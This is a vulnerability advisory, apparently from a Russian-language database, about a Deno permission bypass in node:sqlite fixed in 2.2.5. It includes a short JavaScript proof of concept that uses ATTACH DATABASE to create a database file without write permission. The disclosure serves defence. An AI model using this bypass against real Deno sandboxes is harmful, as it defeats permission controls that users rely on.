Опубликовано: 04 июн. 2025
Источник: github
Github: Прошло ревью
CVSS4: 5.5
CVSS3: 9.1
Описание
Deno has --allow-read / --allow-write permission bypass in node:sqlite
Summary
It is possible to bypass Deno's read/write permission checks by using ATTACH DATABASE statement.
PoC
// poc.js
import { DatabaseSync } from "node:sqlite"
const db = new DatabaseSync(":memory:");
db.exec("ATTACH DATABASE 'test.db' as test;");
db.exec("CREATE TABLE test.test (id INTEGER PRIMARY KEY, name TEXT);");
$ deno poc.js
Пакеты
Наименование
deno
rust
Затронутые версииВерсия исправления
>= 2.2.0, < 2.2.5
2.2.5
Наименование
deno_node
rust
Затронутые версииВерсия исправления
>= 0.129.0, < 0.134.0
0.134.0
Связанные уязвимости
CVSS3: 9.1
nvd
8 месяцев назад
Deno is a JavaScript, TypeScript, and WebAssembly runtime. Starting in version 2.2.0 and prior to versions 2.2.5, it is possible to bypass Deno's permission read/write db permission check by using `ATTACH DATABASE` statement. Version 2.2.5 contains a patch for the issue.